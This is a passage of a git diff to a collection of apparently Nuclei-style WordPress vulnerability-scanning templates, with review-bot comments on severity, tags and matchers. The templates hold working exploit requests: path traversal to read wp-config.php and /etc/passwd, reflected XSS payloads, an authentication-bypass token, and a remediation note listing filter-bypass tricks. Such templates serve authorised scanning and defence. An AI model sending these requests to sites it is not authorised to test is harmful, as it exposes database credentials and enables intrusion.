wordpress,listing,wp-plugin,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/qards/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/qards" + condition: and + + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-revslider-file-download-11554.yaml b/poc/wordpress/wp-revslider-file-download-11554.yaml new file mode 100644 index 0000000000..35aa96c8ed --- /dev/null +++ b/poc/wordpress/wp-revslider-file-download-11554.yaml 
@@ -0,0 +1,29 @@ +id: wp-revslider-file-download +info: + name: Wordpress Revslider - Unauthenticated Arbitrary File Download + author: pussycat0x + severity: high + description: The Vulnerable Revslider WordPress plugin was affected by an unauthenticated download vulnerability,This could result in attacker downloading the wp-config.php file. + reference: + - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html + - https://cxsecurity.com/issue/WLB-2021090129 + metadata: + google-dork: inurl:/wp-content/plugins/revslider + tags: wordpress,wp-plugin,lfi,revslider +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'DB_NAME'" + - "'DB_PASSWORD'" + - "'DB_USER'" + condition: and + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-revslider-file-download.yaml b/poc/wordpress/wp-revslider-file-download.yaml index 35aa96c8ed..a2c97e0a18 100644 --- a/poc/wordpress/wp-revslider-file-download.yaml +++ b/poc/wordpress/wp-revslider-file-download.yaml 
@@ -1,20 +1,27 @@ id: wp-revslider-file-download + info: - name: Wordpress Revslider - Unauthenticated Arbitrary File Download + name: Wordpress Revslider - Local File Inclusion author: pussycat0x severity: high - description: The Vulnerable Revslider WordPress plugin was affected by an unauthenticated download vulnerability,This could result in attacker downloading the wp-config.php file. + description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 metadata: google-dork: inurl:/wp-content/plugins/revslider tags: wordpress,wp-plugin,lfi,revslider + requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + matchers-condition: and matchers: - type: word @@ -24,6 +31,9 @@ requests: - "'DB_PASSWORD'" - "'DB_USER'" condition: and + - type: status status: - 200 + +# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-securimage-xss-11556.yaml b/poc/wordpress/wp-securimage-xss-11556.yaml new file mode 100644 index 0000000000..53a24f1671 --- /dev/null +++ b/poc/wordpress/wp-securimage-xss-11556.yaml 
@@ -0,0 +1,24 @@ +id: wp-securimage-xss +info: + name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/59816/info + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-securimage-xss-11559.yaml b/poc/wordpress/wp-securimage-xss-11559.yaml index 081d25ceec..7b313f46d3 100644 --- a/poc/wordpress/wp-securimage-xss-11559.yaml +++ b/poc/wordpress/wp-securimage-xss-11559.yaml @@ -4,7 +4,7 @@ info: author: daffainfo severity: medium reference: - - https://www.securityfocus.com/bid/59816/info + - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info tags: wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/wordpress/wp-securimage-xss-11560.yaml b/poc/wordpress/wp-securimage-xss-11560.yaml deleted file mode 100644 index 7b313f46d3..0000000000 --- a/poc/wordpress/wp-securimage-xss-11560.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-securimage-xss -info: - name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: - - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 
diff --git a/poc/wordpress/wp-sfwd-lms-listing-11562.yaml b/poc/wordpress/wp-sfwd-lms-listing-11564.yaml similarity index 100% rename from poc/wordpress/wp-sfwd-lms-listing-11562.yaml rename to poc/wordpress/wp-sfwd-lms-listing-11564.yaml diff --git a/poc/wordpress/wp-sfwd-lms-listing-11565.yaml b/poc/wordpress/wp-sfwd-lms-listing-11565.yaml index 62267327ee..adbac15377 100644 --- a/poc/wordpress/wp-sfwd-lms-listing-11565.yaml +++ b/poc/wordpress/wp-sfwd-lms-listing-11565.yaml @@ -4,8 +4,7 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6426 + reference: https://www.exploit-db.com/ghdb/6426 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-simple-fields-lfi-11566.yaml b/poc/wordpress/wp-simple-fields-lfi-11566.yaml index 52b531d8ba..e55a9a7d30 100644 --- a/poc/wordpress/wp-simple-fields-lfi-11566.yaml +++ b/poc/wordpress/wp-simple-fields-lfi-11566.yaml 
@@ -1,25 +1,16 @@ id: wp-simple-fields-lfi - info: - name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE + name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE author: 0x240x23elu severity: high - description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution. - reference: - - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html - metadata: - max-request: 1 - tags: wp-plugin,lfi,packetstorm,wordpress - -http: + reference: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html + tags: wordpress,wp-plugin,lfi +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body - -# digest: 4a0a00473045022100ef08afd8363510ffe9fe413cb68346ce3e3d8bdb892387a0d67b6f071e20449102205e53317445d38cb9f3b5cc9b74f17644e697b5e1e759462f075e5742a90b5ad7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-simple-fields-lfi-11569.yaml b/poc/wordpress/wp-simple-fields-lfi-11569.yaml deleted file mode 100644 index 61752d0cfb..0000000000 --- a/poc/wordpress/wp-simple-fields-lfi-11569.yaml +++ /dev/null 
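Review bot: The new side of wp-simple-fields-lfi-11566.yaml no longer has a `description`, the `metadata` block or the trailing `# digest:` line, so the template loses its explanation and is left unsigned. Keep `description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution.` and regenerate the digest after editing rather than dropping it. The name still advertises LFI/RFI/RCE while the single regex matcher only confirms a read of `/etc/passwd`, and there is no status matcher alongside it; a one-line comment saying that only the file read is verified would keep triage honest.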
@@ -1,20 +0,0 @@ -id: wp-simple-fields-lfi -info: - name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE - author: 0x240x23elu - severity: high - description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution. - reference: - - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html - tags: wordpress,wp-plugin,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-slideshow-xss-11572.yaml b/poc/wordpress/wp-slideshow-xss-11572.yaml deleted file mode 100644 index 0396c00a98..0000000000 --- a/poc/wordpress/wp-slideshow-xss-11572.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: wp-slideshow-xss -info: - name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.exploit-db.com/exploits/37948 - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-slideshow-xss-11574.yaml b/poc/wordpress/wp-slideshow-xss-11574.yaml new file mode 100644 index 0000000000..2b851c9f5b --- /dev/null +++ b/poc/wordpress/wp-slideshow-xss-11574.yaml 
@@ -0,0 +1,29 @@ +id: wp-slideshow-xss +info: + name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://www.exploit-db.com/exploits/37948 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-socialfit-xss-11577.yaml b/poc/wordpress/wp-socialfit-xss-11577.yaml index 0bd0b67947..61f70d16de 100644 --- a/poc/wordpress/wp-socialfit-xss-11577.yaml +++ b/poc/wordpress/wp-socialfit-xss-11577.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - - '' + - '' - type: word part: header words: diff --git a/poc/wordpress/wp-super-forms-11585.yaml b/poc/wordpress/wp-super-forms-11585.yaml index ce1f4ad2b4..febe3675a0 100644 
--- a/poc/wordpress/wp-super-forms-11585.yaml +++ b/poc/wordpress/wp-super-forms-11585.yaml @@ -1,16 +1,21 @@ id: wordpress-super-forms + info: - name: WordPress super-forms + name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6776 - tags: wordpress,listing + description: Searches for sensitive directories present in the super-forms plugin. + reference: + - https://www.exploit-db.com/ghdb/6776 + metadata: + max-request: 1 + tags: listing,plugin,edb,wordpress -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/super-forms/" + matchers-condition: and matchers: - type: word @@ -19,4 +24,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 490a004630440220598c613d50e93acbd1801bb80297c2cd71ed3ac29a43c470434093cb85a247d802205e80e4487cf9ad3eeaa6827d104c42960a6ea6696c6dc759315efc5699146809:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-super-forms-11588.yaml b/poc/wordpress/wp-super-forms-11588.yaml index febe3675a0..d9003227fd 100644 --- a/poc/wordpress/wp-super-forms-11588.yaml +++ b/poc/wordpress/wp-super-forms-11588.yaml 
@@ -1,29 +1,20 @@ id: wordpress-super-forms - info: name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low - description: Searches for sensitive directories present in the super-forms plugin. - reference: - - https://www.exploit-db.com/ghdb/6776 - metadata: - max-request: 1 - tags: listing,plugin,edb,wordpress - -http: + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6776 + tags: wordpress,listing,plugin +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/super-forms/" - matchers-condition: and matchers: - type: word words: - "Index of /wp-content/plugins/super-forms/" - - type: status status: - 200 - -# digest: 490a004630440220598c613d50e93acbd1801bb80297c2cd71ed3ac29a43c470434093cb85a247d802205e80e4487cf9ad3eeaa6827d104c42960a6ea6696c6dc759315efc5699146809:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-tinymce-lfi.yaml b/poc/wordpress/wp-tinymce-lfi.yaml index 9091f13594..d34333cd36 100644 --- a/poc/wordpress/wp-tinymce-lfi.yaml +++ b/poc/wordpress/wp-tinymce-lfi.yaml @@ -1,5 +1,4 @@ id: wp-tinymce-lfi - info: name: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion author: 0x_Akoko @@ -12,15 +11,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - metadata: - max-request: 1 tags: wordpress,wp-theme,lfi,wordpress,tinymce - -http: +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php' - matchers-condition: and matchers: - type: word @@ -29,9 +24,8 @@ http: - "DB_NAME" - "DB_PASSWORD" condition: and - - type: status status: - 200 -# digest: 4a0a0047304502201c2ac9d65b16487b71e4b7c4d880163c783f630561a93ead417b304fd9279cff022100ebb86be060b482ba4fadce96e5cfa137576edf89c454435a38bd7bc0680dca32:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/07/29 
diff --git a/poc/wordpress/wp-tutor-lfi-11596.yaml b/poc/wordpress/wp-tutor-lfi-11596.yaml index 4362f3d8af..02a965a0f1 100644 --- a/poc/wordpress/wp-tutor-lfi-11596.yaml +++ b/poc/wordpress/wp-tutor-lfi-11596.yaml @@ -1,27 +1,16 @@ id: wp-tutor-lfi - info: - name: WordPress tutor 1.5.3 - Local File Inclusion + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion author: 0x240x23elu severity: high - description: WordPress tutor.1.5.3 is vulnerable to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/48058 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + reference: https://www.exploit-db.com/exploits/48058 tags: wordpress,wp-plugin,lfi - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body - -# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-tutor-lfi-11600.yaml b/poc/wordpress/wp-tutor-lfi.yaml similarity index 100% rename from poc/wordpress/wp-tutor-lfi-11600.yaml rename to poc/wordpress/wp-tutor-lfi.yaml diff --git a/poc/wordpress/wp-upload-data-11605.yaml b/poc/wordpress/wp-upload-data-11605.yaml index ad366b15a7..96634b10c2 100644 --- a/poc/wordpress/wp-upload-data-11605.yaml +++ b/poc/wordpress/wp-upload-data-11605.yaml @@ -1,5 +1,4 @@ id: wordpress-upload-data - info: name: wordpress-upload-data author: pussycat0x @@ -7,23 +6,19 @@ info: description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. reference: https://www.exploit-db.com/ghdb/7040 tags: wordpress,listing - requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/data.txt" - matchers-condition: and matchers: - type: word words: - "admin:" - - type: word part: header words: - "text/plain" - - type: status status: - 200 
diff --git a/poc/wordpress/wp-vault-lfi-11610.yaml b/poc/wordpress/wp-vault-lfi-11610.yaml index 5c3b55be99..01d9e3e67e 100644 --- a/poc/wordpress/wp-vault-lfi-11610.yaml +++ b/poc/wordpress/wp-vault-lfi-11610.yaml @@ -1,6 +1,6 @@ id: wp-vault-local-file-inclusion info: - name: WP Vault 0.8.6.6 – Local File Inclusion + name: WP Vault 0.8.6.6 Local File Inclusion author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/40850 @@ -13,7 +13,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 diff --git a/poc/wordpress/wp-vault-local-file-inclusion.yaml b/poc/wordpress/wp-vault-local-file-inclusion.yaml new file mode 100755 index 0000000000..8869a324ad --- /dev/null +++ b/poc/wordpress/wp-vault-local-file-inclusion.yaml @@ -0,0 +1,33 @@ +id: wp-vault-local-file-inclusion +info: + name: WP Vault 0.8.6.6 Local File Inclusion + author: + - l0ne1y + description: |- + WordPress Plugin Vault 存在路径遍历问题导致文件包含漏洞 + WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 + + WordPress Plugin Vault 0.8.6.6存在路径遍历漏洞,该漏洞允许远程攻击者通过wpv-image参数读取系统中的任意文件。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.org/plugins/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' + method: GET diff --git a/poc/wordpress/wp-whmcs-xss-11614.yaml b/poc/wordpress/wp-whmcs-xss-11614.yaml new file mode 100644 index 0000000000..d8da7d8763 --- /dev/null +++ b/poc/wordpress/wp-whmcs-xss-11614.yaml 
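Review bot: wp-vault-local-file-inclusion.yaml rates the finding `severity: critical`, while wp-vault-lfi-11610.yaml in this same commit carries the same `id` with `severity: high`, and the other file-read templates here that include a classification use CVSS 7.5. Use `severity: high` so both copies triage the same way. The new file also has no `tags:` line, so tag-based selection will skip it; `tags: wordpress,wp-plugin,lfi` would match its siblings. Items 4 and 5 of the `remediation` text describe conditions under which filters are bypassed rather than fixes, and would be better removed from that field.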
@@ -0,0 +1,37 @@ +id: wp-whmcs-xss +info: + name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c + tags: wordpress,wp-plugin,authenticated,whmcs,xss +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-whmcs-xss.yaml b/poc/wordpress/wp-whmcs-xss.yaml index 69a4a54185..3c39494408 100644 --- a/poc/wordpress/wp-whmcs-xss.yaml +++ b/poc/wordpress/wp-whmcs-xss.yaml @@ -1,14 +1,11 @@ id: wp-whmcs-xss - info: name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS) author: dhiyaneshDk severity: medium description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting - reference: - - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c + reference: https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c tags: wordpress,wp-plugin,authenticated,whmcs,xss - requests: - raw: - | 
@@ -22,7 +19,6 @@ requests: - | GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: @@ -31,12 +27,10 @@ requests: words: - "" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-woocommerce-email-verification-11619.yaml b/poc/wordpress/wp-woocommerce-email-verification-11619.yaml index e4393fb210..97e8c51dc3 100644 --- a/poc/wordpress/wp-woocommerce-email-verification-11619.yaml +++ b/poc/wordpress/wp-woocommerce-email-verification-11619.yaml 
@@ -1,46 +1,25 @@ id: wp-woocommerce-email-verification - info: - name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass - author: random_robbie,daffianfo + name: wordpress-emails-verification-for-woocommerce + author: random_robbie severity: critical - description: | - Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator. - reference: - - https://wpvulndb.com/vulnerabilities/10318 - - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-288 - metadata: - max-request: 2 - tags: woocommerce,wp,wpscan,wordpress,wp-plugin - -http: + tags: wordpress,wp-plugin + description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + reference: https://wpvulndb.com/vulnerabilities/10318 + # GDPR plugin may give a false positive so double check headers +requests: - method: GET path: - - "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - - stop-at-first-match: true - + - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" matchers-condition: and matchers: - - type: regex - part: header - regex: - - "wordpress_logged_in_[a-z0-9]{32}" - - type: word - part: body words: - - "Your account has been activated!" - - "From your account dashboard you can view your" - condition: and - + - "wordpress_logged_in" + part: header - type: status status: - - 200 - -# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950 + - 401 + - 403 + negative: true 
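Review bot: The new matchers in wp-woocommerce-email-verification-11619.yaml accept any response that is not 401/403 and has the substring `wordpress_logged_in` somewhere in its headers, which is much weaker than the removed check and is still reported at `severity: critical`. The template's own comment admits that a GDPR plugin can trigger it, and any other header that mentions the cookie name would as well. I would keep the cookie-value pattern as a regex matcher, `- "wordpress_logged_in_[a-z0-9]{32}"` with `part: header`, and require a positive `status: 200` instead of a negated 401/403. Keeping `stop-at-first-match: true` also avoids reporting the same site twice now that two paths are probed.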
diff --git a/poc/wordpress/wp-woocommerce-file-download-11620.yaml b/poc/wordpress/wp-woocommerce-file-download-11620.yaml new file mode 100644 index 0000000000..9427c4a15c --- /dev/null +++ b/poc/wordpress/wp-woocommerce-file-download-11620.yaml @@ -0,0 +1,38 @@ +id: wp-woocommerce-file-download + +info: + name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download + author: 0x_Akoko + severity: high + description: | + WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. + reference: | + - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74 + - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + metadata: + max-request: 1 + tags: wordpress,woocommerce,lfi,wp-plugin,wp + +http: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ab1837bca9b6f6e6b23d99458b8a2907f23c71b2f5d81cee55aaac79e9f4c2a6022100db17296e4466ad8f17c1ad98e0b52ef44c844e5d16a60a8a8bcda37220127990:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-woocommerce-file-download.yaml b/poc/wordpress/wp-woocommerce-file-download.yaml deleted file mode 100644 index d49796a7a3..0000000000 --- a/poc/wordpress/wp-woocommerce-file-download.yaml +++ /dev/null 
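Review bot: In wp-woocommerce-file-download-11620.yaml, `reference: |` turns the two URLs into one multi-line string that begins with `- https://…` instead of a list of references. Dropping the block-scalar marker, so that plain `reference:` is followed by the two `- https://…` items, keeps the field the same type as in the other templates of this commit. The description also opens with "WordPress WooCommerce < 1.2.7" although `name` says the affected plugin is Product Input Fields for WooCommerce, so the version bound should be attached to that plugin.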
@@ -1,25 +0,0 @@ -id: wp-woocommerce-file-download -info: - name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download - author: 0x_Akoko - severity: high - tags: wordpress,woocommerce,lfi - description: The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. - reference: - - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74 - - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/ -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml b/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml index 3dc1310215..26b60896bf 100644 --- a/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml +++ b/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml @@ -3,7 +3,7 @@ info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid severity: high - description: Ths template bruteforces username and passwords through xmlrpc.php being available. + description: This template bruteforces username and passwords through xmlrpc.php being available. reference: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ diff --git a/poc/wordpress/wp-xmlrpc-pingback-detection.yaml b/poc/wordpress/wp-xmlrpc-pingback-detection.yaml index d1f2247e27..af1364f6d4 100644 --- a/poc/wordpress/wp-xmlrpc-pingback-detection.yaml +++ b/poc/wordpress/wp-xmlrpc-pingback-detection.yaml 
